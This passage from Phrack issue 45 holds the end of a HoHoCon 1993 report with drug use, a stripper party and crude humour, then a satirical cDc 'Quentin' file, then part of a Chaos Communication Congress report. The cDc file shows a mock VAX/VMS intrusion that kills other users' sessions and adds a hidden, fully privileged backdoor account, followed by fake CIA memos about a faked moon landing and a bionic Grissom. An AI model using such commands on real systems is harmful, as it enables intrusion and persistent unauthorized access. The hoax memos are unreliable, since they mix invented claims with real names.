n2o. Some Andrew Blake film played on the VCR Kevin and his crew had brought, and a new camcorder was being erected to capture the planned debauchery on tape. We asked Kevin how on earth they managed to wheel in a 20 lb tank of nitrous through the lobby and up to the room without being questioned. Kevin said they put it under a jacket and just walked right through. I wondered how long it would be before everyone else began wheeling in kegs. I begged everyone not to put the bags over their heads, as resuscitating any potential asphyxiation victim was not in my agenda. (Quick flashback to a blue-faced man spasming from oxygen depravation, "No really officer, I don't know why he put that bag on his head and went to sleep.") Besides, it would be too far to drag a dead body down to the dumpster from the hotel room without attracting suspicion. The tank was drained and the crowd dwindled. Reflecting upon the altered states of those wandering almost zombie-like around the hotels, I decided that if anyone were to be raiding the con it should be the DEA rather than the FBI. I arrived at the con the next morning lugging a box full of my t-shirts, ready to make the rent. In the conference room Bruce Sterling was in the middle of an incredible rant about the evils of Virii. I don't know what the hell he was talking about. I'm not quite sure if anyone did, but I got the impression that he got zapped. A note to the kiddies: don't copy that floppy! At the door, dFx was busily commandeering the five dollar "voluntary contribution." I asked him how the take was and he whipped out a stack of money that would choke an elephant. I asked him for my share for being his marketing and advertising rep. The money and dFx disappeared. Damien Thorn of Nuts & Volts, whose column is the ONLY reason I subscribe, took the stand and talked about the magazine and his column. I jumped up and asked him about his involvement with Phoenix Rising Communications, and suggested they not use the name "The Phoenix Project" as their BBS name. Damien seemed somewhat apologetic when he said that he didn't realize that it had already been used in the past. (Obviously Sterling's book didn't get read by everyone.) I took off to find out where the casualties from last night were hiding. After a lengthy and fruitless search for Chasin, Tcon or KevinTX, I stumbled back into the con area just in time to find out that LOD Communications would be hitting the podium next. As we all wandered up front, (we being me, Lex, Tabas, Phantom Phreaker, Professor Falken and Al Capone), an explosion of camera flashes shook the conference room. It was the most ridiculous thing I have ever been a witness to. I felt pretty sorry for Lex, who had managed to avoid being photographed as "Lex Luthor" for his entire life, now being the target of every butthead with a Nikon in the greater Austin area. After we rambled about the BBS archive project, I got the chance to give one of the worst presentations of my life. I will credit some of this to the lack of display technology (mainly overhead projector and VGA adaptor) but the main fault was my own. I spoke for a bit about wireless wide area networking via commercial packet radio and about services such as RadioMail. Afterwards, Chasin and I introduced White Knight and The Omega who, in typical cDc fashion, relayed the further adventures of "America's Favorite Hacker: Quentin." At the end of their speech, they offered about a dozen copies of Quentin's latest exposure of a government cover-up. The madcap dash of reporters, hackers and various other would-be co-conspirators to grab the sacred printout was like the closing scene of "It's a Mad Mad World." The stage rush was not terribly unlike my first Metallica concert: people diving over chairs, crawling over heads, screaming, arms flailing. The only difference were the reporters yelling "Press! Press! I must have a copy!" The conference wrapped up with attorney Steve Ryan talking about the sorry state of computer law. Bernie Milligan of Communications & Toll Fraud Specialists from Houston finally ran out of film. (Bernie, if you recall, was at HoHo '92 sitting at the back of the room with the Super Ear. I wonder how much he gets for the photos. Maybe he just tacks them up on his wall and has little fantasy conversations with them as he spanks his monkey. I don't know.) After the speaking was concluded, Weevil wandered over and asked me when the bondage show would be going on. I told him that it would not be happening. Weevil, still very elated over his rave reviews in "Dazed and Confused," looked at me and in a stereotypical Hollywood-esque display of confidence said, "Don't worry about it dude. I'll take care of it." A 17 year old actor and would-be pimp. Yeah, right. I got shanghaied by John Littman who was working on his book about Kevin Poulsen, Agent Steal and friends. We talked for a bit, and I came to the following conclusions: 5 REASONS WHY I AM LIKE AGENT STEAL 1. We both shared a knack for dating strippers. 2. We are both long haired, skinny, aging hackers. 3. We both know the value of a carefully placed camcorder. 4. We both have been the subject of investigations by the government. 5. We both have assisted the government. 5 REASONS WHY I AM NOT LIKE AGENT STEAL 1. I have both my original legs. 2. I only use Saran Wrap for leftovers. 3. I would never dress like any member of Poison. 4. I stopped breaking into buildings when I was 14. 5. I would never turn in my friends to save my own ass. That evening as everyone was getting antsy, Frosty popped up with his "Techno-Porn." Something like 24 hours of non-stop pornography compressed into 6 hours. You'd have to see it to understand. Everyone seemed to migrate towards 508, most likely a direct result of the internal sex & drug divining rods built into the subconscious of every attendee. Sometime around 9 or 10 in the evening, Weevil showed up parading five very attractive, scantily clad young women. The strippers made their way through the lobby of the Hilton evoking a Pied Piper effect, dragging hundreds of drooling hackers in their wake. They managed to get into the hotel room unscathed. Outside the room the crowds gathered, anxious to get a peek at the girlies. The girls, meanwhile, got somewhat agitated, looking around at their predicament. They had given up their Saturday night shift at Sugar's Cabaret (an Austin upscale nudie bar) for the prospect of making some easy cash at HoHoCon. Apparently Weevil exaggerated a bit about the quality of the attendees in his fervor to coax them back to the hotel. I, being a take charge kind of guy, asked the girls what they needed, took some orders, and announced to the crowd that anyone who did not have at least forty dollars needed to get the fuck out. Once word of the necessity of money spread among the riot-like crowds swarming the 5th floor, they became like Donn Parker's hair and thinned quickly and ultimately disappeared entirely. Zar took over the job of guarding the door and making sure that no one got in without showing that they had cash for the girls, and KevinTX rounded up cash from within the room and manned the camcorder and radio. After a few beers, everyone loosened up and the show began. Soon, there were topless women everywhere. There were "table-dances" happening on the toilet, there were women on the beds, and grinding away on the floor in front of a mirror. It was the kind of thing that I'm sure Dr. Mitch Kabay would be shocked and dismayed by, but unfortunately he wasn't in the room. Perhaps he didn't have the cash to get in. Everyone in the room was having a blast. Consultants, reporters, and hackers all equally sharing in the debauchery. Zar gave new meaning to the word "man-handling." I can only thank God that I had sold all my shirts, so I had cash to spare. The night went on, the beer flowed, the dopamine inhibitors kicked in full force, and the money changed hands faster than could be counted. By the end of the evening, everyone had received several "table dances," KevinTX had whip marks on his back, Weevil had won my complete admiration, and the girls made a small fortune. Each of the dancers walked away with over $200 in cash. The biggest winner was a really hot little 18 year-old named Cathy who raked in almost $400. As the night drew to a close, the room emptied, the girls gathered up their outfits and made for home, or paired up to go somewhere else. I awoke Sunday somewhere else. No comment. (I couldn't anyway, since I have no recollection.) So ended HoHoCon. --------------------------------------------------------------------------- Additional HoHoCon Reviews: HoHoCon Review Spring 1994 ~~~~~~~~~~~~~~ By Netta Gilboa (Gray Areas) (Page 30) Rising From the Underground March, 1994 ~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Damien Thorn (Nuts & Volts) (Page 100) ------------------------------------------------------------------------------ (Vibe Magazine & Aasahi Computing to have articles soon) ==Phrack Magazine== Volume Five, Issue Forty-Five, File 12 of 28 **************************************************************************** "Quentin Strikes Again" In the Fall of 1992, "NBC: Dateline" aired a show on computer hackers, interviewing Erik Bloodaxe, Doc Holiday and a person named "Quentin." Half- way through the show, Quentin is shown with his back to the camera, text scrolling across his screen. Dateline seemed oblivious: on closer inspection, Quentin was displaying a file which listed various MIL and GOV sites which allegedly had "autopsies of extra-terrestrials on record", information about UFO crash sites, detailed governmental research on alien beings. By December, that Dateline episode had created quite a stir within the hacker community. Who was Quentin? What file was he displaying? Was this an elaborate hoax, a joke which failed to gain the attention of NBC? At HoHoCon '92 in Houston, Bloodaxe and Holiday explained that the file did exist and the information it contained was in fact true. Lending some credence to the story, well-placed sources indicated that the White House had requested a copy of the episode from NBC. Bloodaxe and Holiday refused to name the people involved, but explained that a relatively unknown group had formed to pursue a project they referred to variously as "Project ALF" and "Project Green Cheese", searching government computers for any evidence which might verify a UFO cover-up. Apparently they struck pay dirt. By the Summer of 1993, at least one member of Project Green Cheese had "disappeared." White House aide Vincent Foster turned up dead after an apparent suicide; among documents found in Foster's office possibly linking President Clinton to a failed Arkansas Savings & Loan, a videotape was also found: the Dateline episode on Hackers. Apparently buoyed by their success, the Green Cheese group began scanning an unpublished prefix in the 202 NPA toward the end of the Summer. They were surprised to learn that nearly every number in that prefix was answered by the same authoritative voice asking, "Who is this?" Not to be discouraged, the group continued until they happened upon a lone DEC Server. There they uncovered documentation suggesting a covert action of a different kind: a cover-up instigated by the three-letter agencies and NASA, perpetrated upon the public with the unwitting aid of the media in the early 1970s, beginning with the death of three astronauts. What follows is an excerpt of their discovery. -- The Omega White Knight cDc / RDT cDc / RDT DDDDD OOOO CCCC VV VV AA XX XX DD DD OO OO CC CC VV VV AAAA XX XX DD DD OO OO CC VV VV AA AA XXXX DD DD OO OO CC ---- VV VV AA AA XX DD DD OO OO CC ---- VV VV AAAAAA XXXX DD DD OO OO CC CC VVV AA AA XX XX DDDDD OOOO CCCC V AA AA XX XX DEFENSE ADVANCED RESEARCH PROJECTS AGENCY DOCUMENT REPOSITORY W A R N I N G: This computer system is operated by the United States Government and is protected under provisions of USC Title 23, Section 67. Unauthorized access is STRICTLY FORBIDDEN. ENTRANCE: USERNAME: FIELD PASSWORD: $ SET ACCOUNTING/DISABLE $ SET LOGINS/INTERACTIVE=0 $ SHOW USERS VAX/VMS INTERACTIVE USERS 23-JUL-1993 09:37:15.54 Total number of interactive users= 6 Username Process Name PID Terminal BRUNO BRUNO 0000026B TTD3: FIELD* FIELD 00000FF2 TTC2: JOHNSON _TTD5: 0000026D TTD5: LINCOLN LINCOLN 0000026A TTD2: SMITH SMITH 000001D8 TTD4: $ SET PROCESS/PRIVS=ALL $ STOP/ID=26B $ STOP/ID=26D $ STOP/ID=26A $ STOP/ID=1D8 $ SET DEF SYS$SYSROOT:[SYSEXE] $ RUN AUTHORIZE UAF> ADD BOVINE /PASSWORD=CULTEE /UIC=[099,900] /CPUTIME=0- /DEVICE=SYS$SYSROOT /DIRECTORY=[SYSEXE] /PRIVS=ALL /NOACCOUNTING UAF> EXIT $ DIR *.* [DEATH_STAR] [ECDYSIAST] [IPSUM] [KIMOTA] [LOREM] [MAGIC] [PPYRUS] [TOC] ^Y $ SET DEFAULT $ TYPE *.MAI;1 DL 433-54-3937 10/28/71 Central Intelligence Agency Internal Memorandum PPYRUS SECTION This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. TO: Thomas J. Kelley, Director, PPYRUS Section FROM: Bill Brown, PP Deputy Chief SUBJ: Preliminary Briefing #1 Special Projects, PPYRUS Pursuant to reg. 3-2638-A, it is my responsibility as Deputy Chief, this section, to inform and apprise the incoming Director of all special projects planned or currently underway, as well as incidental or related projects. PPYRUS projects, this Administration, include: Project Inception ------- --------- MAGIC 5/69 SKY-HOOK 7/69 ARAGON 11/69 ANTIGONE 1/70 KILO 9/70 ORACLE 4/71 DPULTRA 8/71 PPYRUS related projects, this Administration, include: Project Inception ------- --------- UMENSCH 2/63 CAPRICORN 7/68 Of these projects, DPULTRA (and two related projects, UMENSCH and CAPRICORN) require your immediate attention and approval. (1) This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. [CONTINUE] ^M DL 433-54-3937 10/28/71 Central Intelligence Agency Internal Memorandum PPYRUS SECTION This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. BACKGROUND, PROJECT CAPRICORN ---------- ------- --------- By 1965, NASA's public relations machine was in high gear, advertising amazing (and non-existant) advances in American space technology and setting an ambitious schedule for the Space Agency's top priority: a manned space flight to the moon by the end of the decade. Despite the few successes NASA and the Air Force had had with rocketry, in a memo to the President, dated 11/13/67, NASA reluctantly expressed some doubt that a moon mission could be accomplished even by 1973. The President made it clear that the moon mission was, by now, more of a political mission than one of science, and its success was of the utmost national priority. World sentiment at the time favored the Russians, their flawless successes a seeming vindication of the power and motivation of the Communist system. Further, the President felt that a success could deflect attention from the Vietnam war and re-invigorate public sentiment in the United States toward the nation, the Administration, and the ingenuity of American technology. As a contingency for failure, CAPRICORN was instigated, its final approval to be decided by the middle of the following year in a meeting between the President, DIRNASA, DIRCIA, DIRNSA and attendant adjutants. The President summed CAPRICORN up in these words, "If we can't be heroes, we can damn well act like heroes!" CAPRICORN's mission was a relatively simple one: covert deception of the public and media, under the guidance of PSYOPS and PPYRUS; a manned moon mission would be simulated and pre-recorded in a controlled environment, later to be broadcast "live." By June of 1968, CAPRICORN was recommended and Presidential approval given. (2) This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. [CONTINUE] ^M DL 433-54-3937 10/28/71 Central Intelligence Agency Internal Memorandum PPYRUS SECTION This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. BACKGROUND, PROJECT CAPRICORN (cont'd) ---------- ------- --------- CAPRICORN was an unqualified success resulting in, among other things, later congressional approval for a large appropriation of funds to further NASA's successful research. BACKGROUND, PROJECT UMENSCH ---------- ------- ------- In February of 1963, DARPA gained oversight of an ancillary NASA research project that began with the discovery of efficient micro-machines and light, extraordinarily strong alloys. These new discoveries implied the possibility for advance along a relatively new field of science: cybernetics. DARPA reacted enthusiastically by forming project UMENSCH. Most information on UMENSCH, DARPA is unwilling to share. But this much is clear: under the direction of DARPA, NASA got the opportunity to test this technology on a human subject with the crash of an experimental flying-wing in 1966. As his CLASSIFIED service record indicates for the years 1960 - 1965, Lieutenant Colonel Virgil Grissom (see Air Force files for Grissom, Virgil I., USAF 563-87-2981; CI DL 118-26-9069) had an exemplary record as an Air Force test pilot, including a stint as a U2 pilot during 1956-1959, performing reconaissance missions over Cuba and Southeastern China. In fact, it was Grissom's missions which confirmed the mass starvation of over 10 million Manchurian Chinese in 1959. Grissom barely survived an XF-17 crash at Edwards Air Force Base, September 17, 1966. His right arm was badly crushed during an emergency ejection shortly after take-off. DARPA offered Grissom a chance to regain the limb through risky, untried technology: a cybernetically-enhanced prosthetic implant. DARPA termed the marriage of cybernetic implants with biology, BIONICs. The surgery was successful well beyond UMENSCH's projections; not only did Grissom's BIONIC arm function as well as his original arm, but in conjunction with a BIONICly enhanced upper skeleture, Virgil's right arm was capable of lifting several hundred pounds and inflicting marked fatigue in steel objects. DARPA's investment of technology and secrets in Virgil Grissom in effect made Grissom UMENSCH property and necessarily privy to several sensitive projects. (3) This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. [CONTINUE] ^M DL 433-54-3937 10/28/71 Central Intelligence Agency Internal Memorandum PPYRUS SECTION This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. BACKGROUND, PROJECT UMENSCH (cont'd) ---------- ------- ------- Colonel Grissom was an obvious astronaut candidate and by the following year was training for GEMINI. In fact, because of Grissom's access to a project as sensitive as UMENSCH, Grissom was later tapped to aid in the staging of CAPRICORN. THE APOLLO LAUNCHPAD FIRE; GRISSOM, YOUNG, & WHITE --- ------ --------- ---- ------- ----- - ----- You're already well aware of the fire this July on the Apollo launchpad, which reportedly killed astronauts Grissom, Young and White. What you are not aware of, however, is that Grissom managed, with the aid of BIONICs, to escape the space capsule just before Young and White were asphixiated. It is not clear why Grissom apparently made no attempt to rescue his crew-mates or why he used the ensuing confusion to leave Canaveral. For whatever reason, Grissom is now a loose-cannon. Despite a massive, but low-key manhunt, the officially-dead ex-astronaut's whereabouts are currently unknown, though we have reason to believe he may have made his way to California or Texas. We suspect dissolution with the American space program -- CAPRICORN, in particular -- may lead Grissom to go public and compromise UMENSCH and CAPRICORN. BACKGROUND, PROJECT DPULTRA ---------- ------- ------- "The most convincing lie is the one that's half true..." -- Samuel Butler DPULTRA is a damage-control project of utmost priority. Its goal is to desensitize the American public to the potential existence of a BIONIC-enabled man and secondarily, any allegations concerning CAPRICORN, the ludicrous portrayal of the first discrediting the second. PSYOPS' proposed project involves the production of a network television show, produced in part with Company funds, Pro-US propagandizing, which will lionize the American Intelligence Community and plant the seed in the public's mind that projects like CAPRICORN and UMENSCH are impossible -- due to the inherent silliness of the show's plotlines, week after week. (4) This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. [CONTINUE] ^M DL 433-54-3937 10/28/71 Central Intelligence Agency Internal Memorandum PPYRUS SECTION This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. BACKGROUND, PROJECT DPULTRA (cont'd) ---------- ------- ------- DPULTRA's success is directly related to the Nielsen ratings it can garnish and to ensure its success, PSYOPS personnel will be involved in writing the scripts. PSYOPS suggests peppering the show's plots with psychological archetypes -- symbols from Jung's collective unconscious -- and possibly even subliminals (if need be). The story line will, nevertheless, be played straight but also utterly implausibly. I would like to discuss DPULTRA further with you in person at our next Monday-morning meeting. (5) This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. [CONTINUE] ^M DL 433-54-3958 11/07/71 Central Intelligence Agency Internal Memorandum PPYRUS SECTION This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. TO: Thomas J. Kelley, Director, PPYRUS Section FROM: Bill Brown, PP Deputy Chief SUBJ: DPULTRA PROJECT DPULTRA OUTLINE ------- ------- ------- Following our meeting Monday, this is an update on DPULTRA. In keeping with our RMD objectives, we've begun working on ideas this week. Much progress, although finished scripts are probably a month or two away, depending on the final series terms from American Broadcasting. WeØve settled on character names and sketches: DRAMATIS PERSONAE Dr. Rudy Wells, An otherwise unremarkable man, the genius behind BIONICs Oscar Goldman, Director of a secret governmental intelligence agency, OSI Steve Austin, Astronaut/Test Pilot/OSI Agent; renowned as the first Man on the Moon. Similarity to the name Sam Houston results from the necessity to attract Texas viewers particularly (as well as Californians). Following is a list of show ideas for the first season, along with input from the PSYOPS officers. PSYOPS wants us to plant collective archetypes and possibly subliminals in order to carve the show's subtext into the mind as deep as possible, and to generate the largest market share possible. These psychological implants will be joined with or disguised under ephemeral pop culture references, such as UFOs, Aztecs, Bigfoot, Cold Warrior, Earthquakes, the mystique of the American Indian, and the paranormal. (1) This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. [CONTINUE] ^M DL 433-54-3958 11/07/71 Central Intelligence Agency Internal Memorandum PPYRUS SECTION This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. PROJECT DPULTRA OUTLINE (cont'd) ------- ------- ------- SUPPORTING CHARACTERS Venus Probe, Earth-launched probe mistakenly returns, wreaking havoc Sasquatch, Otherwise known as "Big Foot"; a UFOnaut with BIONICs Farrah Fawcett, Reporter/Journalist foil for Steve Austin Aztec Warrior, _Chariots of the Gods_ to its ultimate conclusion Bionic Boy, Temporarily BIONIC-enabled Gary Savin, Heretofore unknown, rogue $7 million man William Shatner, ...and dolphins. "Something Wonderful..." happens to astronaut Bill on one of his space-walks Fembots, Female grotesques; "All this, and BIONICs, too!" Evil androids created by an unnamed, nefarious agency Abridged list of possible episodes include: Sasquatch --------- During an OSI science investigation of the San Andreas fault in the wilderness of Northern California, Steve encounters Big Foot. Steve later learns that Big Foot is the product of extra-terrestrial genetics and cybernetics, but his purpose on Earth is never clarified. In a later episode, Steve re-visits the heavily forrested area and initiates a friendship with Sasquatch, eventually saving his life. Venus Probe ----------- An interplanetary probe (like the planned Viking probes) destined for Venus slingshots through the alien atmosphere and returns to Earth. Its computer program doesn't realize that anything's wrong, so it begins its collection routines. Unfortunately, it has returned to our planet with an extremely tough armor plating (resulting from a chemical reaction with Venus's atmosphere) and it's zigzagging its way through Southern California. It possesses wicked collection equipment which in this environment are effective weapons. Anyone who gets near it is in great danger. Eventually, Steve and the national guard defeat the device by luring it into an open pit filled with very caustic acid. (2) This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. [CONTINUE] ^M DL 433-54-3958 11/07/71 Central Intelligence Agency Internal Memorandum PPYRUS SECTION This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. PROJECT DPULTRA OUTLINE (cont'd) ------- ------- ------- Amnesia ------- As the result of a head injury, Steve is stricken with amnesia. Consequently, forgets that he possesses bionic powers. He ends up living out an alternate possible life -- moves in with a woman and gets a job as a construction worker. Everything is fine until Steve happens upon a woman and her child, pinned inside a wrecked car. He tears away the metal and extricates the people, who are grateful but become frightened when they see wires sticking out of a tear in his flannel shirt. Eventually, OSI catches up to him before anything too out of hand occurs, and Steve regains his memory by episode's end. If this show is a success in its first season, PSYOPS would like to consider a spin-off involving a second BIONIC character. The spin-off would include: ADDITIONAL CHARACTERS Jamie Sommers, Substitute Teacher/ex-Tennis Pro; an unlikely OSI agent; A love-interest for Steve, Jamie obtains her BIONICs after a parachuting accident Max the Dog, Formerly a laboratory subject, horribly burnt in a fire; Now BIONIC-enabled. Psychologically traumatized, Max goes berserk at the first sign of flame Jamie Sommers ------------- Jamie, a Junior Highschool substitute teacher and ex-Tennis pro, and Steve are engaged to be married. At this point, Jamie knows nothing of Steve's involvement with OSI or his BIONIC abilities. On a vacation parachuting trip, Jamie is injured, paralyzed. Steve pleads with Dr. Wells to restore her limbs through BIONICs. Wells accedes. Except that Jamie has amnesia and has no idea who Steve is. Jamie is instructed in her new BIONIC abilities, and begins to exercise them, when her body rejects the BIONIC implants, physically and emotionally traumatizing Jamie. OSI eventually solves the implant rejection problem, but Rudi cautions Steve that if he tells her of her past, it may induce the trauma of the BIONIC rejection. Steve lives with the pain of knowing that Jamie is his first love and that, for fear of her safety, can never tell her. (3) This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. [CONTINUE] ^M DL 433-54-3958 11/07/71 Central Intelligence Agency Internal Memorandum PPYRUS SECTION This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. PROJECT DPULTRA OUTLINE (cont'd) ------- ------- ------- Aztec Warrior ----- ------- Investigating an abandoned WW II bunker along the California coast which seems to be emitting powerful radio-frequencies, Jamie discovers that an ancient Aztec pyramid lies below the bunker's foundation and is now accessible through a hidden tunnel. In the pyramid, Jamie is confronted with an 800-year-old Aztec warrior bent on protecting the contents of the pyramid and repelling intruders. In an allusion to CHARIOTS OF THE GODS, extra-terrestrials are receiving from the pyramid's beacon the electronic version of an invitation to re-visit the planet. Jamie learns, however, that chemicals seeded into the atmosphere as part of a NASA project to end continental drought will ultimately interfere with the propulsion system of the alien craft. Fearing the accidental destruction of the aliens will bring extra-terrestrial retaliation, Jamie thwarts the Aztec guard and destroys the beacon. (4) This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. [CONTINUE] ^M DL 433-54-3958 12/10/73 Central Intelligence Agency Internal Memorandum PPYRUS SECTION This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. TO: Bill Brown, PP Deputy Chief FROM: Thomas J. Kelley, Director, PPYRUS Section SUBJ: DPULTRA Nearly two years into the project, I congratulate you on DPULTRA's success; the show has consistently rated high in the Nielsens, topping "Starsky & Hutch" and occasionally beating out "M*A*S*H*". However, there seem to be several problems and the show requires a nearly intolerable suspension of disbelief. To wit: 1. Running at 60 mph, why doesn't the Bionic Man's sneakers ever wear out? 2. Steve Austin never received a Bionic heart, spine, respiratory system, musculature or skeleture. How is it that his body doesn't collapse when he lifts objects that weigh tons? 3. Most of Steve's body seems to be metallic; how does he make it past airport metal detectors? 4. How can Steve's Bionics defy principles of physics, like inertia? 5. Steve's Bionic implants are nuclear-powered -- an energy source potentially capable of generating more heat than the sun. How can Steve's Bionics slow down and even fail, when exposed to cold? 6. Steve Austin's Bionics cost $6 Million -- a sum that seems laughably inexpensive. Why is the Bionic Woman's pricetag Classified? 7. How can a world-famous, instantly recognizable astronaut make a "perfect undercover agent"? 8. A bionic dog? What's next? A bionic earthworm? A bionic tarantula? 9. Jamie Sommers' cover includes continuing her vocation as a substitute teacher; how does she make time to be a secret agent? 10. Where do the Fembots come from? Are they important to the show? 11. Re: The Venus Probe episode -- why is a probe whose purpose is to collect soil samples, heavily endowed with weapons? How can that probe not realize it's not on Venus? If it's armored enough to withstand the atmosphere of Venus, how was Steve able to destroy it in a pit of acid? Why was it malevolent? îýûå‰÷õÛUŽj ‡ºJ Α‘¾¹/ËÀ=ž«~ ÎÚ_’ƒ^“?ð¾¾<Α=‘¯Ž¾~|\H +” ” ¿ª½ éŸð¹1’ÁrG-ÜÕðx¦^PáWßžO”V2/Áž ®Ô3Þ’€-A©‹¦F".°Htß Í sï`•Ï”mÀ}ËyN|µ¯h í.x]iÈ NO CARRIER ------------------------[ END OF FILE ]---------------------------- ==Phrack Magazine== Volume Five, Issue Forty-Five, File 13 of 28 **************************************************************************** The 10th Chaos Computer Congress by Manny E. Farber Armed only with an invitation in English addressed to the "global community" and a small pile of German Marks, I arrived at the Eidelstedter Buergerhaus about an hour or so before the beginning of the 10th Chaos Communication Congress (subtitled "Ten years after Orwell"), sponsored by the (in)famous Chaos Computer Club. The Buergerhaus (literally, "citizen's house") turned out to be a modest community hall; needless to say, not all invited showed up. The Congress took place between the 27th and the 29th of December. As the title implies, social as well as technical issues were on the docket. After forking over 30 DM (about $20) for a pass for the first two days of the Congress, I sort of felt like asking for a schedule, but refrained, thinking that asking for scheduled chaos might seem a bit odd. I went to the cafeteria for breakfast. An organizer started out announcing, "Anyone who wants to eat breakfast pays 5 Marks, and gets a stamp, which--no, rather, anyone who wants breakfast pays 5 Marks and eats breakfast." The atmosphere was quite collegial and informal, with little more order than was absolutely necessary. The approximately 150 attendees were predominantly German (a few from Switzerland and Holland, at least -- and probably only -- one from the United States, namely myself), male, and technically oriented. (During an explanation of the mathematical algorithm underlying electronic cash, a non-techie objected, "But I don't want to have to think up a 200-digit random number every time I buy something!" It was explained to him that this was done by software in the chip-card ...). Although not mentioned in the invitation, not a word of English was to be heard; all the events were conducted in German. Some were conducted in a "talk show" format, with a host asking questions, simplifying answers, making jokes. A television network carried the video from the auditorium to other rooms throughout the building (albeit without sound) along with up-to-the-minute event schedules. The tone of the discussions of how electronic cash could be embezzled, or chip cards abused, digital signatures forged, etc., was constructive rather than destructive. And it was balanced, i.e. not only "how could a malicious individual embezzle money?" was discussed, but also "how could the government use chip cards to reduce people's privacy?" Here, the "hackers" were hackers in the positive sense of understanding a technology, not in the negative sense of wreaking havoc. It was, however, noted that trying out a potential weakness of the "EuroScheck" cash cards was quite easy: it would require buying a card reader for 1,500 DM and maybe a week of time. The question of technical solutions to "big brother" did come up in the presentations about chip cards. The danger is that a pile of cards is eliminated in favor of a card containing someone's driver's license, driving record (maybe), employee information, credit information, etc. etc. A chip card could theoretically be programed to give out *only* the information absolutely necessary, e.g. telling a policeman only that someone is allowed to drive, without disclosing his identity. The "Hackzentrum" (Hacking Center) turned out to be a room filled with networked computers and people hacking on them. It seemed mostly harmless. (I nevertheless did not try a remote login -- I had no reason to doubt good intentions, but on the other hand, who knows who wrote or replaced the keyboard driver and what sort of supplemental functionality it might have?) The packet radio room had a "Digi" repeating station and, true to the ham radio tradition, where the conversation centers on who is talking to whom and how well they hear each other and on what other frequency they might hear each other better, the computers attached were mostly displaying maps of the packet radio network itself. I didn't delve very deeply into the "Chaos Archive," but noticed a collection of maintenance sheets for telephone equipment among CCC newsletters and other paraphenalia. Some "signs of the Congress": - Bumper sticker: "I (heart) your computer" - Telephone stickers: "Achtung, Abhoergefahr" ("Attention, Eavesdropping danger"; and the German PTT logo transformed into a pirate insignia, with the words "Telefun - Mobilpunk" (derived from "Telefon - Mobilfunk") - T-shirt: "Watching them (eye-ball) watching us" - Post-It Note pad (for sale for DM 1.50): a pad of about 50, pre-printed with a hand-written note: "Vorsicht, Stoerung. Automat macht Karte ungueltig" ("Careful--Defect. Machine makes card invalid") - Word coinage: "Gopher-space" - Stamp: "ORIGINALE KOPIE" ("ORIGINAL COPY") The press were told not to take pictures of anyone without their explicit permission. Schedules were distributed throughout the Congress. By the evening of the 27th, a schedule for the 28th, "Fahrplan 28.12 Version 2.0," was already available ("Fahrplan" means a bus/train schedule; this is presumably an "in" joke). By 17:30 on the 28th, "Fahrplan 28.12 Version 2.7" was being distributed. (I missed most of the intervening versions; presumably they were neatly filed away in the Chaos Archive by then ...) The scheduled events (in translation) were as follows; a "*" means that I have included some comments later in this report: December 27, 1993 - Welcoming/opening - How does a computer work? - ISDN: Everything over one network - Internet and multimedia applications: MIME/Mosaik/Gopher - Data transport for beginners - Chip-cards: Technology * Media and information structures: How much truth remains? Direct democracy: information needs of the citizen - Encryption for beginners, the practical application of PGP * Alternative networks: ZAMIRNET, APS+Hacktic, Green-Net, Knoopunt, Z-Netz and CL December 28, 1993 - Encryption: Principles, Systems, and Visions - Modacom "wireless modem" - Electronic Cash - Bulletin board protocols: Functional comparison and social form, with the example of citizen participation - Discussion with journalist Eva Weber - Net groups for students, Jan Ulbrich, DFN * What's left after the eavesdropping attack? Forbidding encryption? Panel: Mitglied des Bundestags (Member of Parliament) Peter Paterna, Datenschutz Beauftragter Hamburg (Data privacy official) Peter Schar, a journalist from Die Zeit, a representative from the German PTT, a student writing a book about related issues, and a few members of the Chaos Computer Club - Cyber Bla: Info-cram * How does an intelligence service work? Training videos from the "Stasi" Ministrium fuer STAatsSIcherheit (Ministry for National Security) - System theory and Info-policies with Thomas Barth - Science Fiction video session: Krieg der Eispiraten ("War of the ice pirates") December 29, 1993 - Thoughts about organization ("Urheben") - Computer recycling - Dumbness in the nets: Electronic warfare - Lockpicking: About opening locks - The Arbeitsgemeinschaft freier Mailboxen introduces itself - In year 10 after Orwell ... Visions of the hacker scene ------------------------------------------------------------------------------- THE EAVESDROPING ATTACK This has to do with a proposed law making its way through the German Parliament. The invitation describes this as "a proposed law reform allowing state authorities to listen in, even in private rooms, in order to fight organized crime." This session was the centerpiece of the Congress. Bayerische Rundfunk, the Bavarian sender, sent a reporter (or at least a big microphone with their logo on it). The panel consisted of: MdB - Mitglied des Bundestags (Member of Parliament) Peter Paterna DsB - Datenschutz Beauftragter Hamburg (Data privacy official) Peter Schar Journalist - from Die Zeit PTT - a representative from the German PTT Student - writing a book about related issues CCC - a few members of the Chaos Computer Club My notes are significantly less than a word-for-word transcript. In the following, I have not only excerpted and translated, but reorganized comments to make the threads easier to follow. IS IT JUSTIFIED? MdB - There is massive concern ("Beunruhigung") in Germany: 7 million crimes last year. Using the US as comparison for effectiveness of eavesdroping, it's only applicable in about 10-20 cases: this has nothing to do with the 7 million. The congress is nevertheless reacting to the 7 million, not to the specifics. In principle, I am opposed and have concerns about opening a Pandora's box. CCC #1 - The 7 million crimes does not surprise me in the least. I am convinced that there is a clear relationship between the number of laws and 